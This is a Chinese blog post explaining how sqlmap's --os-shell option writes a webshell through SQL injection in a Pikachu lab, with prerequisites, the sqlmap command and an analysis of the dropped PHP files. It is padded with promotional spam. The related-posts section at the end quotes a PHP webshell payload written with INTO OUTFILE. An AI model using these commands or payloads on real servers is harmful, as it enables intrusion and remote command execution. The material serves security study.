sql写shell原理_sql注入写入shell的条件

于 2024-05-17 08:26:16 发布
阅读量599 收藏 11
点赞数 24
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84281655/article/details/138990784
版权

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

本次验证涉及的工具有:
1 Sqlmap 版本为1.7.2 
2 Phpstudy 版本为8.1.1.3(Apache+Php(5.4)+Mysql(5.7))
3 Burpsuite 2021专业版
4 Notedpad++
5 Navicat 
6 中国蚁剑
7 靶场环境为Pikachu 
工具都是常见工具,如需要请网上自行下载

二、原理简介

1.Sqlmap写shell条件

1. 知晓网站的绝对路径
原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然
蚁剑如何连接
获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录
2. 对web目录有可写权限
即secure_file_priv = ''配置为空 
原因是--os-shell参数写入shell使用的是select xx into outfile而secure_file_priv此配置
控制着是否允许通过 LOAD DATA INFILE 和 SELECT ... INTO OUTFILE 等方式来
读取或写入本地文件。如果为NULL则不允许,为空允许,但是默认情况是一个路径
表示对此路径有读写权限
3. 魔术引号关闭
原因是因为防止路径被魔术引号转义,导入sql语句执行失败 但魔术引号在php稍高版本
被弃用

2.Sqlmap写shell过程简介

在上述条件满足后,执行Sqlmap,设置对应的语言、web目录,Sqlmap会通过outfile函数
将在指定目录生成两个php文件,一个文件用于文件上传,一个文件用于接受命令参数执行系统命令

三、验证过程

1.验证准备

(1)访问靶场漏洞页面,通过Burp抓取应用层数据包,并将请求包保存为txt文件
在这里插入图片描述
右击拦截包选择复制到文件即可

(2)开启Mysql的访问日志,主要用于验证Sqlmap的请求
默认情况Phpstudy没有开启日志记录,需要打开配置文件添加后重启相关服务
在这里插入图片描述
重启后在目录生成了mysql.log,此时并没有访问,因此可以看见是没有记录的
在这里插入图片描述

2.验证

在Sqlmap目录打开命令行并启动
由于是测试,知晓有漏洞就直接使用–os-shell了
sqlosshell.txt为burp保存的数据包

启动命令:python3 sqlmap.py -r sqloshell.txt --os-shell

运行后跑出了相关注入点及其它信息
在这里插入图片描述
根据要求选择后获取到os-shell
在这里插入图片描述
执行Ipconfig后获取回显
在这里插入图片描述
此时打开网站根目录发现多了两个php文件
在这里插入图片描述
查看后文件内容如下
大致功能就是上述提到的,一个文件用于文件上传、一个用于接受参数执行系统命令
在这里插入图片描述
此时你可能有疑惑这两个文件怎么来的?
此时我们找到刚才开启日志记录的文件,这个文件记录了所做的查询等操作,你会发现这样的数据
在这里插入图片描述
其中的十六进制解码就是上述文件中上传文件的源码
由于我不是很会Sql语句就很好奇为什么会将内容写入到文件,于是搜索了 LINES TERMINATED BY的用法,其作用是用于指定分隔符,
对你没看错,把所有的php代码进行十六进制转换然后当作了分隔符,因此上述文件的查询结果和php代码是连接在一起的,此处还是有
点巧妙之处。
访问上传页面上传shell,也可以用蚁剑连接
在这里插入图片描述

总结

此处有个奇怪的点是上传的命令执行文件我并没有在mysql日志中找到记录,猜测是通过有上传功能的那个php文件上传的,因为access.log中有访问记录,但由于是POST提交只记录了请求行,并没有请求内容。如果有大佬知晓,麻烦告知一二。

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84281655
关注
  • 24
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysqlshell
weixin_47385895的博客
08-22 1856
mysql常见shell方法
sqlmap中的--sql-shell
qq_45751902的博客
10-25 7387
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
渗透测试|sql注入Getshell的几种方式
最新发布
jennycisp的博客
11-03 1437
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell
SQL注入webshell
huangyongkang666的博客
03-25 2666
SQL注入webshell 1.MySQLshell 写入WebShell的几种方式 1、利用Union select 写入 需要满足的条件web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
sqlshell原理
xyxyxyxyy的博客
09-14 770
主要阐述了sqlmap工具webshell到mysql中的原理
高级SQL注入shell,一般黑客不知道1
08-08
标题中的“高级SQL注入shell,一般黑客不知道1”指的是黑客利用SQL注入漏洞来获取服务器的控制权,也就是所谓的“shell”。SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL语句,欺骗Web应用程序,使其...
shell在指定目录下批量执行sql脚本的实例
09-15
本文将详细介绍如何使用shell脚本来在指定目录下批量执行SQL脚本,这对于数据库管理员来说是非常实用的技巧。 首先,让我们分析给定的shell脚本: ```bash #!/bin/bash MYDATE=`date +%F'-'%T'-'%w` MYSQL_PATH=/...
Linux—编shell脚本操作数据库执行sql
12-14
  一般我们会通过sql脚本,然后将xxx.sql脚本放到数据库中进行source xxx.sql执行。本篇文章,我们可以通过shell脚本来执行数据库操作。 配置文件 创建 test_sql.properties 作为shell脚本的外部配置参数修改...
360天擎-前台sql注入1
08-03
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
python执行shell获取硬件参数写入mysql的方法
09-10
在本文中,我们将深入探讨如何使用Python来执行shell命令获取硬件参数,并将这些信息写入MySQL数据库。 首先,Python提供了多种方法来执行shell命令: 1. `os.system()`:此函数用于执行shell命令,并返回一个整数...
Shell脚本中执行sql语句操作mysql的5种方法
01-10
对于自动化运维,诸如备份恢复之类的,DBA经常需要SQL语句封装到shell脚本。本文描述了在Linux环境下mysql数据库中,shell脚本下调用sql语句的几种方法,供大家参考。对于脚本输出的结果美化,需要进一步完善和调整。以下为具体的示例及其方法。 1、将SQL语句直接嵌入到shell脚本文件中 代码如下: –演示环境  [root@SZDB ~]# more /etc/issue  CentOS release 5.9 (Final)  Kernel \r on an \m    root@localhost[(none)]> show variables like ‘
sql注入getshell的几种方式
热门推荐
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
Sqlmap注入参数/shell命令参数/通用参数/杂项参数
buffedon的博客
07-24 4255
Sqlmap参数汇总2指定url位置注入设置指定注入参数设置URI注入位置设置任意注入位置注入参数指定某种注入指定表名设置DNS攻击设置二次注入探测指纹信息DBMS信息获取sqlmap暴力破解数据文件读读文件文件shell命令--os-shell--os-pwn(结合msf)sql-shell注册表通用参数爬虫杂项参数 指定url位置注入 设置指定注入参数 在我们的 sqli-labs-master 中的url中一般都是一个参数id。但是有的url中会有多个参数id,name等 sqlmap.py -u
SQL——shell命令
qq_36912885的博客
09-02 1783
8.0之后的sql毛病是真鸡多,把这些常用的命令的都记录下来。里面包含了从安装到使用,远程登录,密码,redis,等等乱七八糟的问题。
sql注入(一)---shell中的sql基本语法和sql手动注入基础原理
xiao_xiao_lan的博客
04-23 1051
这里目录标题shell窗口中的数据库数据库的基本语法知识information_schemaperformance_schema shell窗口中的数据库 数据库的基本语法知识 -u后面为数据库的用户名,而此处使用的root是为管理员权限,-p则是password,之后输入密码进入数据库: show databases;显示所有数据库(其中information_schema和performa...
SQL Shell常用的指令
weixin_46653974的博客
08-08 634
1、\c或\connect :连接到数据库。12、\s或\set:设置SQL Shell的变量。6、\i或\include:从文件中执行SQL指令。11、\timing:启用\禁止查询执行时间的显示。16、\x或\X:切换输出模式为扩展模式,以便更好地显示复杂的查询结果。10、\h或\help:显示SQL Shell的帮助信息。8、\g或\gexec:执行当前输入的SQL命令。7、\e或\edit:编辑当前输入的SQL命令。4、\l或\list:显示所有数据库的列表。2、\d或\dt :显示数据库中的表。
sqlmap mysql udf提权_利用sqlmap命令--sql-shell进行mysql提权的小方法之udf提权
weixin_35861708的博客
01-19 1667
udf提权1.原理UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限2.利用条件Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于c:winntsystem32...
sqlmap mysql shell_利用SQLmap 拿服务器shell
weixin_39528525的博客
01-27 2300
1、简介sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:1)基于布尔的盲注...
SQL注入shell条件
05-19
首先,需要找到一个存在 SQL 注入漏洞的目标网站,并且能够执行 SQL 语句。然后,我们可以通过 SQL 注入漏洞来执行任意的操作,比如写入 shell。 以下是一个可能的 SQL 注入 shell条件: 1. 目标网站存在 SQL 注入漏洞。 2. 目标网站的数据库管理用户具有写入文件的权限。 3. 目标网站使用的数据库是 MySQL。 4. 目标网站的 PHP 版本低于 5.3.4。 在这个条件下,我们可以使用 MySQL 的 LOAD_FILE 函数来读取服务器上的文件,并使用 OUTFILE 将数据写入服务器上的文件。 以下是一个可能的 SQL 注入 shell 的步骤: 1. 找到目标网站的 SQL 注入漏洞点,构造一个可以执行任意 SQL 语句的注入字符串。 2. 使用 SELECT LOAD_FILE('/path/to/file') 语句读取服务器上的某个文件,并将其输出到网页上。 3. 将步骤 2 中读取的文件内容复制到剪贴板中。 4. 使用 SELECT ... INTO OUTFILE '/path/to/file' 语句将步骤 3 中复制的文件内容写入服务器上的某个文件中。 5. 在服务器上访问刚刚写入的文件,就可以执行 shell 命令了。 需要注意的是,这种方法可能会受到安全软件的拦截,因此需谨慎使用。同时,使用这种方法可能会违反法律法规,造成严重后果,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值